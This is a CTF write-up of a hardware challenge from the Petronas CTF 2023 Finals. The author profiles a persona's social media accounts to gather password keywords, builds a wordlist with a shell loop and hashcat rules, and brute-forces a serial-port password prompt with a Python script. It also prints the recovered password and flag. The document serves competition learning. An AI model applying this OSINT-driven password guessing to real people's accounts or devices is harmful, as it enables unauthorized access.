📗 CTF Writeup
Petronas CTF 2023 Finals - A Bad Afternoon to Lose a Box Challenge Writeup
date
Oct 13, 2023
slug
petronas23-hardware
author
status
Public
tags
Petronas
OnlyFeet
Hardware
OSINT
CTF
summary
A writeup for one of the challenges in the Petronas CTF Finals 2023. It’s a mix of hardware, OSINT and scripting.
type
Post
thumbnail
category
📗 CTF Writeup
updatedAt
Dec 14, 2023 07:08 AM
Didn’t manage to screenshot a lot of stuff for this challenge, sorry :’D
Challenge #2: A Bad Afternoon to Lose a Box
This is a hardware challenge where participants only had certain timeslots to connect to the hardware. There are no screenshots/pictures of the hardware since time was of the essence, and also because I had to return it immediately when it was solved :’)
The hardware itself was concealed in cardboard and black duct tape, preventing participants from visually assessing it. However, a cable was supplied to establish a connection.
When connected to the hardware via the cable provided, it:
- Cannot be found in the file explorer
- Cannot be detected as a disk
- No notification indicated the connection of a drive (At least for Windows during my attempt)
And it was because it wasn’t a drive (A very obvious fact that I realised pretty late lol). So, I opened Device Manager to find which communication (COM) port it was connected to. (Would need the information later)
Anyways to access the content, we would need to find a way to establish a connection so I thought of using PuTTY! By choosing the serial connection type and the COM port gotten earlier, I got to establish a session.
The session basically prompts for a password, and returns “Incorrect password” when the user inputs a wrong password. At this point, I just assumed the correct password would output the flag.
Hence the only clues we have will be on the challenge description.
By reading the question, the phrase "Alita Wizard" stood out. My first thought was that I had to make a password list using this clue, set up a script to bruteforce the password list to the COM port. However, the challenge creator that walked past me said I didn’t have enough information to do so yet, hence to Google we go AHHAHAH
Googling “Alita Wizard” by itself will show a lot of Alita: Battle Angel (Movie) related content.
So I thought maybe it was a cybersecurity wizard named Alita? But I found nothing as well. At this point, I thought what if it's an actual person’s name? So I tried to find any mentions of this name on social media.
Searching “Alita Wizard” on Instagram will give you an account:
My intent was to gather more keywords to be added to the password bruteforce list, so by looking at the Instagram account, I got a few of them:
- Dog
- Beagle (Dog breed)
- Desserts
- Cupcake
I also tried searching “Alita Wizard” on Twitter / X, which will also give you another account:
My intent was to gather more keywords to be added to the password bruteforce list, so by looking at the Twitter account, I got a few of them as well:
- Dog
- Muffin (I narrowed it down from dessert to muffin because of the Kenny Rogers Roasters post)
I tried searching for other social media using other tools like Sherlock etc, but couldn’t find any. So I decided to work on the word list.
I first gathered my list of keywords, and placed it in
list.txt:dog beagle muffin alita wizard
Since the social media handles had the year 1993 appended behind, I decided to append the year to the wordlist as well using this command:
for i in $(cat list.txt); do echo $i; echo ${i}1993; echo ${i}93; done >> list2.txtdog dog1993 dog93 beagle beagle1993 beagle93 muffin muffin1993 muffin93 alita alita1993 alita93 wizard wizard1993 wizard93
Now it is time to pick the rule, I actually picked the best64.rule by HashCat and bruteforced that list. But since it was taking too much time, I tried the capitalization of the first character and combination of the words as a bare minimum wordlist resort (lol).
# Making a custom rule to capitalize the first character echo c > custom.rule # Using the customer rule to generate a new wordlist hashcat --force --stdout list2.txt -r custom.rule > list3.txt # Combining the two wordlists together hashcat --force --stdout -a 1 list2.txt list3.txt > final_list.txt hashcat --force --stdout -a 1 list3.txt list2.txt >> final_list.txt
Next, I scripted a Python script that uses the
serial module to send commands from the final_list.txt file to a USB device connected at the COM port earlier.import serial import time # Specify the COM port com_port = "COM7" # Create a Serial object ser = serial.Serial(port=com_port, baudrate=9600, timeout=1) # Function to send command and receive response def send_command(command): # Send command ser.write(command.encode('utf-8')) # Wait for a short duration to allow response to be received (I adjusted this a lot) time.sleep(10) # Read and return response response = ser.read_all().decode('utf-8') return response # Read commands from the list and send them with open("final_list.txt", "r") as file: commands = file.readlines() for command in commands: response = send_command(command.strip()) print(f"Command: {command.strip()}\nResponse: {response}\n") # Close the serial port ser.close()
It had an error initially about being unable to connect to the COM port, but it turns out it was because the COM port allows only one application or instance to connect to it at a time (I had the PuTTY session running in the background as well when I ran the code, oops). This is because serial communication involves sending data sequentially, and having multiple applications accessing the port simultaneously could lead to conflicts and data corruption.
So by closing the PuTTY session and running the code, we get the correct passcode and the flag!
Password: muffinBeagle1993
petgrad2023{Th3_Qu@n7um_N3xu$_Pr0t0typ3}
